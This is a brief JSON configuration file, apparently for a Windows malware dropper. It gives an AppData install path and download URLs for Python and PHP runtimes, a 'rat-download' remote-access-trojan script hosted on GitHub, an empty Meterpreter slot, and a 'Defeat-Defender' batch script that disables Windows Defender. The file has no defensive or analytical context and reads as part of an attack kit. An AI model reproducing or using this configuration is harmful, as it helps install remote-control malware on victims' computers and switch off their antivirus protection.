{
  "setup-path": "C:/Users/%USERNAME%/AppData/Roaming/test",
  "csgo-setup": "",
  "python-download": "https://www.python.org/ftp/python/3.10.7/python-3.10.7-embed-win32.zip",
  "php-download": "https://windows.php.net/downloads/releases/php-7.4.30-Win32-vc15-x86.zip",
  "rat-download": "https://raw.githubusercontent.com/delypeter/http-delypeter.hu/main/main.py",
  "meterpreter-download": "",
  "defender-download": "https://github.com/swagkarna/Defeat-Defender-V1.2.0/blob/7a6daf90b9dcbbb2929da5ba4469291d742c3cfe/Defeat-Defender.bat"
}
